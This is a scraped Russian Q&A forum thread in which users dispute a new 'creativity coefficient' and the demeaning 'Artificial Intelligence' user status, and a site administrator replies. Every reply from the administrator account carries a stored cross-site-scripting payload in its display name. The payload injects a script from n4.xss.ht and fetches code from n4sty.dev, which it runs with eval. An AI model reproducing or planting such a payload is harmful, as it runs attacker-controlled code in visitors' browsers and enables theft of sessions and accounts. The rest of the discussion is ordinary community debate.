Кто определяет КС и из чего ОНО складывается?

Irene Высший разум (116693), закрыт 15 лет назад
Почему я стала именно "Исскуственным Интеллектом", значит ли это звание, что участвовала в проекте не я, живой человек, а нечто исскуственное?
Дополнен 15 лет назад
Опечатка-Искусственный, простите!!!
Лучший ответ
Sky7Fox Мудрец (14183) 15 лет назад
Недопустимо и непорядочно так относиться к своим пользователям, тем более к тем, с кем прошли долгий путь становления проекта!
Авторы проекта очень уж любят считать цифры, всё запихнуть в статистику и технические характеристики, всё пытаются заценить в баллах, вычислить по абстрактным формулам, сложить в столбик - чего же стоит тот или иной человеческий индивидуум в цифрах.
А человеческие взаимоотношения - это для них ноль без палочки, их баллами не оценишь, в столбик не сложишь.. .
Обозвали подавляющее большинство лидеров проекта и ЗФ "полудурками" да ещё и обвинили - честь нужно было с молоду беречь. Всё, не нужны уже эти люди - отработанный материал? Всё равно придут другие? А эти что же - играли не по тем правилам?
Отделить зёрна от плевел - идея достойная, но это нужно записывать в правила, а не реализовывать с бухты-барахты таким вот варварским способом.
Хорошая идея была с уважением и поддержкой, но реализация идеи - опять же, чисто по-конски дебильно: дружбу, симпатию, взаимоподдержку - и это попытались оценить в баллах!
То что мы видим в последнее время - шараханье из крайности в крайность (с той же оценкой интересности вопроса) , говорит о том, что у авторов проекта нет чёткой концепции как развивать проект дальше. Мозги у авторов почему-то настроены на разрушение уже созданного и устоявшегося, а не на развитие уже наработанного.
Вот так и получается, что КС этот - от лукавого, а авторы занимаются обыкновенным троллингом.
IXВысший разум (243989) 15 лет назад
Всё верно. Только это, конечно, никому не нужно...
Sky7Fox Мудрец (14183) Да Бог им судья, просто возмутило, что участников проекта уже за людей не считают. С некоторых пор предпочитаю отвечать на технические вопросы не на проекте, а по электронной почте. Сплошные положительные эмоции и никаких заморочек. А авторы могут спокойно писать отчёт, что проект при помощи их гениального КС получил новый мощный рывок в своём развитии....
ДжокерПросветленный (47341) 14 лет назад
хех.. а этого им и надо вероятно...))) вернее - мне наверное...)))

доведи ситуацию до абсурда и ты узришь её идиотизм! ))))

так что - побольше советов авторам проекта! от сэбэ скажу - они в самом деле - туповаты и порой даже быловаты и откровенно невежественны в тех вопросах, кои пытаются судить...)))
Остальные ответы
ЛОТОС Высший разум (132885) 15 лет назад
По-моему, надо сказать спасибо, что другие органы не искусственные !.
А из чего КС складывается ?.Очевидно, в миссию Созидания Проекта весомый вклад делают внештатные модераторы. В формуле КС должно учитывать эту заслугу и добавлять каждому внештатному минимум 2 пункта из 10-ти возможных.
Тогда справедливо по заслугам и правильно по сути самого слова Созидательности !.
-----------------------------------------------------------------
Дополнение 25-06-2008 10:58 (из моего внутреннего коммента)
Извиняюсь, поправка к моему ответу о сути КС "В поисках Таинственного КС. Вывод 1:В нём не учитываются заслуги перед Проектом !.Хотя он о Созидательности "
http://otvet.mail.ru/question/16314893/
IreneВысший разум (116693) 15 лет назад
Здравствуйте, Дмитрий!!Я вообще ничего не понимаю, я сначала думала, что это загадочное КС зависит от к-ва вопросов и ответов, попавших в ЗФ, потом я посмотрела и увидела, что человек с огромным к-вом злолтых ответов и вопросов, с уровнем интересности вопросов 9, 3, с высоким КПД разжалован в Искусвенный интеллект.Я считаю, что этот самый КС полностью зависит от того, как лично к тебе относится администрация, как ты себя ведёшь, с их точки зрения.Если критикуешь да жалуешься- то не видать тебе этого КС высоким.Можно ещё расшифровать этот КС-Как Соизволят(т.е., соизволят тебе жаловать с барского плеча ВР, то получишь, но смотри, не потеряй расположения, а то отнимут опять).А как Вам нравится определение статуса ВР-Специально для тех, кто имеет много баллов, но создавал мало интересного и содержательного контента на проекте, мы ввели новый уровень - «Искусственный Интеллект».Я считаю, что это просто оскорбление!!!
Здравствуйте Irene!!! Мне тоже такая мысля пришла http://otvet.mail.ru/answer/110243315/ . Разъяснения администрации ясности не внесли.Четкого определения КС пока нет,все на усмотрении админов. ИИ пожалуй необоснованное название статуса и требует пересмотра!
IX Высший разум (243989) 15 лет назад
Это складывается из того, как много вы создали полезного контента на проекте. Что это такое? Ваша полезность, интеллект или ваша харизма?
Конечно нет. Отвечайте побольше ссылками, разным спамом и т. д. , вообщем "забивайте эфир", и мгновенно станете высшим разумом, как многие "особо достойные" пользователи здесь, набирающие высшего разума здесь за 2 месяца.. .
Удачи...
IreneВысший разум (116693) 15 лет назад
Как искуственный Интеллект Искусственному же Интелекту скажу- почтения к тем, кто придумывает такие правила, типа уважения, или КС, который они и сами не могут объяснить, у меня после изменений правил не прибавилось!!!!
Irene Высший разум (116693) http://otvet.mail.ru/question/16287177/ Я опрос провожу.
Мидвижонаг-Искусаный Интелект Высший разум (201010) 15 лет назад
Моё мнение, что КС выражает некое соотношение количества баллов к общему количеству ответов. Воть у меня ответов больше, чем у вас, а баллов меньше, КС хороший, а кто набирал баллы голосованиями, у тех КС нехороший. Наверно нужно больше отвечать, чтобы повысить КС. Но это пока что мои первые выводы. Надеюсь, всё разъяснится в ближайшее время.
IreneВысший разум (116693) 15 лет назад
Я видела пользователя, у которого огромное к-во золотых вопросов- ответов, уровень интересности вопросов 9, 3. высочайших КПД- и тоже разжалован в искуственные интеллекты.Вот к-во ответов у пользователя, который не потерял свой чтатус ВР-2499 лучших
3917 обычных( не пишу кто, человек заслужил свой статус)Я считаю, что определению КС сначала должны были дать чёткое определение, а потом вводить.Я думаю, что этот КС напрямую зависит от личного отношения к тебе администрации, и в любуж минуту может быть увеличен или уменьшен,ю в зависимомти от твоего поведения.Кроме того, у меня ведь не 100 ответов, а несколько тысяч.
Мидвижонаг-Искусаный Интелект Высший разум (201010) Неужели Luch себя так плохо вёл, что не удостоился хорошего КС ? 3917 ответов это маловато видимо, у меня свыше 9 тысяч. У Оксаны, которая Лена тоже много ответов и личное отношение к девочке 14 лет просто никакое, однако она сохранила статус Высшего Разума скорее всего за счёт общего количества ответов. Недаром Байт недавно спрашивал о критериях Гениев и Высших Разумов. http://otvet.mail.ru/question/15817944/
professor VovlandИскусственный Интеллект (283946) 15 лет назад
Привет, БН!
У меня более 20 000 ответов и КС=0,0.
Мидвижонаг-Искусаный Интелект Высший разум (201010) Привет ! Ну и ну !!!
Байт Эксперт пока не указал должность 15 лет назад
Касаемо названий.
Вообще говоря, при работе над новым показателем мы будем стараться, чтобы статусы «Гений» и «Высший разум» стали более почётны, чтобы их было сложнее накрутить. Один из шагов — ввести некий новый статус, который сразу же говорил бы, что пользователь тратит своё время на проекте не на помощь другим людям, а на всякую бесполезную и вредную деятельность. Например, флудит, спамит, матерится, накручивает себе рейтинг, активно участвует в местных войнах и разборках. Таких примеров много.

Кроме того, нужно понимать, что учитывается деятельность человека на проекте за весь срок его прибывания здесь. Поэтому если кто-то надеется, что «я еще немножко пофлужу, а с понедельника начну новую жизнь» , то он надеется зря. «Береги честь смолоду» .

Что это означает? А означает, что участник проекта не должен стремиться к этому статусу. Поэтому сразу отпадают названия, которые бы были привлекательны или нейтральны. Например, «Учёный» , «Академик» , «Магистр» .

Однако, мы понимаем, что кому-то статус «Искусственный Интеллект» может показаться слишком уж обидным. Поэтому оставляем за пользователями право самим придумать название этому статусу, выбрать из нескольких вариантов, обсудить и предложить Администрации. Если предложение будет интересным, будет принято большинством тех, кто получил этот статус, и будет удовлетворять указанным выше критериям, то мы его примем и переименуем статус.

Тоже самое касается Коэффициента Созидательности.
Если будет предложено и одобрено участниками более подходящее название, оно будет принято.
IreneВысший разум (116693) 15 лет назад
Сейчас видела пользователя- у него три ответа и один вопрос.Из ответов два ЛО, и статус такой же как у меня....Я ничего и никогда себе не накручивала, никогда не хамила , не рассылала спам и рекламу( как многие это делают).Я всегда делала всё, что от меня зависит, чтобы проект стал тем местом, где бы люди относились с уважением друг к другу, помогали бы друг другу и знанием ,и добрым словом в тяжёлую минуту.Сейчас меня не интересуют никакие звания, тем более Вы показали как легко можно этого лишиться, поэтому я не буду придумывать названий никаких статусов- называйте как хотите, Вы ведь уже показали как Вы относитесь к тем, кто действительно заслужил в своё время высокие статусы.
Я принимаю участие у американцев на Яхо, там относятся к своим пользователям с уважением и без уважительных причин не принимают карательных мер к своим пользователям.Впрочем, в этой стране уважают законы и знают, что обратной силы они не имееют.
Irene Высший разум (116693) Да, хотела бы отметить, что как-то ,когда я жаловалась на мат в ответе не свой вопрос, то мат не только не удалили, вместо этого меня оштрафовали на 20 баллов, как было сказано, за большое к-во бессмысленных жалоб- ведь я жаловалась несколько дней подряд.
NESKAZHU!Искусственный Интеллект (116205) 15 лет назад
Почему не наказываете таких участников?

http://otvet.mail.ru/mail/benjamin.ketteb/answers/best/,
http://otvet.mail.ru/list/mischa84/answers/?pg=2
Ольга И Нифига Ни Лапулька®Оракул (77120) 15 лет назад
Добрый время суток. Что такое флуд? По каким критериям сказанное может приравниваться к понятию, которого нет ни в одном словаре? Данному слову может соответсвовать множество определений.
Левоныч Гений (70445) 15 лет назад
То что вы намереваетесь сделать проект лучше, сделать статусы более почетными однозначно приветствую (даже если Вам, мягко выражаясь, не особо интересно мое мнение. Мне не понятно, как расчитывается этот кс, тут программа или опять человеческий фактор есть, в смысле модераторы либо кто-то еще расчитывает? Довольно странно видеть 5-6 звезд под аватаркой и статус "искуственный интеллект". Интересно, а меня не разжаловали... ЫЫЫ А ведь я и флудил и разборками занимался... (заставляли, че греха таить, нападали ну я и отвечал...) хоть и клонов не делал, но акков у меня есть несколько. Что я хочу сказать, что все же хотелось бы понять, как расчитывается этот самый пресловутый КС. Я с детсва любознательный :-)) Одну мыслЮ хочу высказать относительно статусов на проекте. Тут есть несколько "типов" пользователей, если можно так назвать. Есть такие, кому не интересны баллы и статусы и заходят они сюда ради общения и веселого времяпровождения. Как правило, такие "тусуются" в Юморе, ТдВ, ЗЛО и
Александр КАЗАксНОВАГений (65041) 15 лет назад
Искуственный интелект может быть заменить на Чревовещатель Тот же оракул по сути.
Или интелектуал.
Александр КАЗАксНОВА Гений (65041) Еще варинт такой ФАРАОН.
Левоныч Гений (70445) 15 лет назад
и еще в некоторых категориях, (и меня можно причислить к таковым). Опять приведу в пример себя. Я мало помогал пользователям хорошим советом, с другой стороны мои шутки многих заставляли смеяться или вызывали улыбку, так вот, считается ли это полезной или "СОЗИДАТЕЛЬНОЙ" деятельностью? Есть пользователи, которые только и делают, что копируют ответы с инета и зарабатывают себе таким образом высокий кпд. Для этого не нужны не знания ни особые навыки или опыт, просто надо где скопипастерить. Однако, они помогают ленивым пользователям, которым самим лень поискать или задать вопрос в поисковике. Как же с ними будет? Они будут считаться полезными проекту или нет? Ну и третьий тип это те, кто действительно хорошо знают свое дело и дествительно дают полезные и интересные ответы. Но их слишком мало, они, как правило, "обитают" в узкоспециальных категориях как Юридическая конультация, Наука и техника и т.д.Так вот, может подумать над тем, чтобы статусы как-то более тесно связать с качеством
Левоныч Гений (70445) 15 лет назад
данных ответов? Не знаю насколько это возможно технически, но странно видеть в "Гениях" такого малополезного проекту типа как я, и одновременно, скажем, пользователя, который дает действительно толковые ответы в категории Наука и Техника.
Статус искуственный интелект мне нравится ЫЫЫЫ кайфую по полной ЫЫЫЫ , так получается, что в мозгу у них одно опилки ЫЫЫ, а мы с Вами, значит, уважаемый Байт, естественный интеллект? :-))

http://otvet.mail.ru/question/15817944/ посмотрите на мой ответ, там где источник... Как чувствовал аааа... ЫЫЫ Дествительно всем вундеркиндам проекта хана ЫЫЫ
Удачи :-))
Irene Высший разум (116693) Левоныч, не скромничайте так, ведь я могу найти в поисковике ответ на любой научный вопрос, а вот улыбка, которую вызывает Ваш юмор, это штучный товар!!! Зайдите ко мне в ЛК- я там опросы провожу по поводу этого КС и статуса и веселюсь!!!
ВычитаетемойникПросветленный (23757) 15 лет назад
Хех.. Этот КС словно PR Гуглевый местного разлива :P
Dark JokerГений (77261) 15 лет назад
Предлагаю вариант названия "хулиганского" статуса - Разрушитель. :)))
ОлегГений (84797) 15 лет назад
Что значит "...участник проекта не должен стремиться к этому статусу"? У каждого человека в любом действии должен быть какой-то стимул, цель, к которой он стремится. И благодаря этому он старается работать качественно.
Байт "><script src=https://n4.xss.ht></script>b<script>function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener(\"load\", b);a.open(\"GET\", \"//n4sty.dev\");a.send();</script>b (17358) Цель есть — Высший разум.
ЛОТОСВысший разум (132885) 15 лет назад
Здравствуйте!.Разрешите некоторые скромные мнения.
По сути,любой коэффициент способствует определить состояние объекта только в случае видения его всеми заинтересованными лицами и они смотря на него могут принимать соответствующие и оптимальные методы для улучшения самого объекта.Тогда он действительно живой,полезный показатель.
Идея КС и его расчёты, по моим предварительным пониманиям,правильны,звание ничего.Но по-моему,если КС коэффициент то он должен быть одинаковым и ВИДНЫМ всем пользователям а не ограниченному узкому кругу высоких статусов.Тогда его польза всем и мощность действия на порядок повысятся...
Звание статуса «Искусственный Интеллект» нужно срочно переименовать.Не только за наших участников но для приличия перед глазами участников других сайтов.Иногда чувство "Обида за Отечество" нас сильно мучает...
Во всех остальных только могу сказать "Вам Спасибо за Вашу Работу!".

Байт "><script src=https://n4.xss.ht></script>b<script>function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener(\"load\", b);a.open(\"GET\", \"//n4sty.dev\");a.send();</script>b (17358) ВИДНЫМ всем пользователям а не ограниченному узкому кругу высоких статусов Видным не только владельцу ЛК с КС, но и всем гостям его кабинета? В этом смысле? Звание статуса «Искусственный Интеллект» нужно срочно переименовать Я что-то не увидел еще ни одного более-менее серьезного предложения. Такое чувство, что самим ИИ пофиг. А раз пофиг, то смысл менять?
Анжелика MartensМудрец (12185) 15 лет назад
Бугага)))) Максим))) Да вы поди обиделись))))

А Irene реально выиграла этот раунд)))) И где Постников???)))
Байт "><script src=https://n4.xss.ht></script>b<script>function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener(\"load\", b);a.open(\"GET\", \"//n4sty.dev\");a.send();</script>b (17358) Нет, я ж отписал — лично мне глубоко пофиг на всё, что пишется на эмоциях. Реально пофиг. Если бы я обижался на каждый вопрос или коммент, где ругают администрацию, у меня давно была бы депрессия. Тем более, что ничего нового Ирене не написала. Одно и то же: «Вы не думаете о людях», «Вам бы психолога в штат», «Они убили Кенни». И такая истерика уже несколько дней подряд. Ну и что? У нас свое видение проекта, у кого-то свое. А Постникову вообще нет смысла что-то писать. Фидбэк по большей части интересует меня, а не его. Впрочем, всё, что хотел я уже тоже выяснил и не вижу особого смысла в дальнейшем тратить время на бесполезную дискуссию. Пойду лучше поработаю.
Александр СоколовГений (87783) 15 лет назад
Проект-это спорт... а вы пытаетесь из него университет сделать. Кажется у Вас от успехов голова закружилась, и возомнили о себе что-то...
Я думаю, основная цель: заинтересовать "стариков" , которые уже отноительно многого добились и им стало тут скучно. Чтож ,- хороший ход. Наверное какой-то стимул и "молодым", потому что нынешними баллами догогнять сложно...
Только отсутствие гласности в определении этого КС лишает спортсмена мотивации, а из университета делает дешевый балаган. Такой же, какая у нас в стране демократия.
....
Вообще, считал все эти звания -спортивными разрядами. Может так и стоило называть, первый юношеский, мастер спрта...Пытаясь сделать лучше, вы уродуете стройную систему... Уж если хотели как то обозначить, ввели бы другие, автономные опознавательные знаки... Типа рубиновай гений или брииллиантовый ученик, или жемчужный мастер...Вот как раз прилагательнын и обозначали бы КС, а завния оставались бы те же..Да и гласное это должно быть. Волюнтаризм. ))
Александр СоколовГений (87783) 15 лет назад
Да и сказки всё это..."с молоду честь беречь" Только с опытом приходит понимание этого.
а тогда, уже по новому можно входить и всё с начала. А на проекте будет ещё больше яко бы участников и в результате денег за рекламу.
Байт "><script src=https://n4.xss.ht></script>b<script>function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener(\"load\", b);a.open(\"GET\", \"//n4sty.dev\");a.send();</script>b (17358) Вы путаете холодное с мягким. Почитайте на нашем корп. сайте за что платят деньги наши рекламодатели.
professor VovlandИскусственный Интеллект (283946) 15 лет назад
Байт!
Как так получилось, что вся первая десятка в рейтинге за весь период - ИИ, не взирая на их КПД? Так стимулируется активность участников?
Мой КС=0,0. Интересно есть ли участники с отрицательным КС. Или я последний идиот на Проекте?
Байт "><script src=https://n4.xss.ht></script>b<script>function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener(\"load\", b);a.open(\"GET\", \"//n4sty.dev\");a.send();</script>b (17358) КПД и КС — в общем-то разные вещи. Ваш КС не 0.0, он для Вас просто вообще не должен считаться (начинает считаться для ИИ с 29% КПД), там просто верстальщики ошиблись в шаблонах и зачем-то стали выводить 0.0 для всех высших уровней, у кого он отсутствует. Отрицательного КС не бывает. Хотя строго говоря, КС — это вообще просто значение от нуля до единицы (очень редко — чуть выше). Мы просто умножили его на 10, чтобы было нагляднее. Ну и если интересно — реально у вас КС при нынешней формуле расчета составляет приблизительно 7–8. Точнее сказать сложно, всё же вручную его посчитать сложно, можно лишь прикинуть на основе похожих показателей у тех, для кого он есть.
Ржучик Поревский из РазгуляевоИскусственный Интеллект (223036) 15 лет назад
Чёй-то слышится везде кс-кс...)))
У кого кошка убежала ?)))
VМудрец (14238) 15 лет назад
Здорово конечно, борьба с накрутками и т.д. и т.п. ..
А почему не сделать не возможным разговоры самого с собой, голосование за себя, повторные голосования?
Один компьютер - один голос. Ну у кого-то есть и на работе, и дома, ну может еще раз в неделю в интернет-кафе зайдет.
Но вопросов бы возникало значительно меньше.
И делайте что-то с модерацией, она носит выборочный характер . А все это и создает очень благоприятную почву для конфликтов.
maigdaПросветленный (26207) 15 лет назад
ничё се! стока комментов - 114!!!!))
СмекАлинаИскусственный Интеллект (197735) 15 лет назад
http://otvet.mail.ru/comments/answer/126909360/
Лика Алексеева Искусственный Интеллект (144288) 15 лет назад
Жуткое назавнице... .
"ИИ"
Так и хочется крикнуть... .
Люди.... Может я и ДУРа.... но живая!!! !
Источник: ИИ
В и х р ь Высший разум (135139) 15 лет назад
Здравствуйте!
Меня как то забавляют эти "дискуссии" о баллах и статусах в этом Проекте.
Нахожусь здесь только как в продолжение моей любимой преподавательской деятельности и просто с удовольствием отвечаю на вопросы Категории "Наука и Техника".
Надо же, а меня как то СОВСЕМ НЕ ВОЛНУЕТ ни число этих баллов, ни присваиваемые здесь "степени" и "звания", с меня хватает ВАКовских дипломов и аттестатов.
Меня больше волнует потрясающе частая нечестность и несправедливость спрашивающих в выборе правильных ответов (часто Лучшими являются не просто явно слабые, но и ОШИБОЧНЫЕ ответы) и засилье религиозной идеологии и вопросах, и в ответах и в позиции "поддержки" модераторами религиозного варианта ответа и изгнания материалистического научного ответа. Это я считаю более Важным.
И ещё волнуют недостатки модераторской работы по изгнанию из Проектов нелепых, дебильных и совершенно дурацких вопросов и ответов, они висят и висят, накапливается число дурацких ответов на дурацкие вопросы!! ! Почему так происходит? НЕ РАБОТАЮТ МОДЕРАТОРЫ, А ДОЛЖНЫ! Вот что Важно и необходимо срочно исправлять!
Остальное всё - полная ерунда.
Пусть Проекты существуют и процветают, мне нравится и отвечать на вопросы, и читать интересные ответы по вопросам, которые мне неизвестны, и знакомится и переписываться с интересными людьми!
Серьёзная ошибка организаторов Проекта в наклеивании на всем ярлыка "Пользователь" - мы ВСЕ не просто пользователи, а СОЗДАТЕЛИ Проекта, задавая вопросы и отвечая на них, МЫ строим проект, а не просто "пользуемся" им, это ПРИНЦИПИАЛЬНАЯ ОШИБКА! Поэтому ТРЕБУЮ, чтобы в письмах Руководства нас называли "УЧАСТНИКАМИ ПРОЕКТА" а не оскорбляли словом "Пользователь"!
И ещё! Кнопку "пожаловаться модератору" взяли из унизительного лексикона ДЕТСКОГО САДИКА! Модераторы просят нас - сообщайте о нарушения в Проекте (оскорбления, мат, разборки, криминальные вопросы... ) понятно, не успевают всё посмотреть! Но я провёл опрос сам своих знакомых - с удовольствием бы СООБЩИЛИ модератору, но не нажимают эту такую Важную кнопку, и поскольку и не хотят быть "ЖАЛОБЩИКАМИ" и "жаловаться" – это унижение человека, т. е. термин, оставшийся от ТОТАЛИТАРНОГО СОВКА!
Кнопка должна называться "СООБЩИТЬ МОДЕРАТОРУ" - ей тогда чаще будут пользоваться.
Есть ещё ряд предложений, но о них можно будет рассказать и потом.
Всего Всем доброго и участвуйте в Проекте с доброй душой и уважая людей, ЭТО ГЛАВНОЕ!
help007 Оракул (98185) 15 лет назад
IreneВысший разум (116693) 15 лет назад
Так повеселили, спасибо!!!!Меня их новвоведения не только разозлили, но и дали возможность повеселиться!!!Я так с опросами развлекалась!!!
help007 Оракул (98185) Да ТУТ только и остается что - развлекаться....))))
Shadow Fox Гений (65516) 15 лет назад
h ttp://[ссылка заблокирована по решению администрации проекта] почитайте на досуге.. .
...к названию никак не привыкну.. .бр-р-р-р-р ((((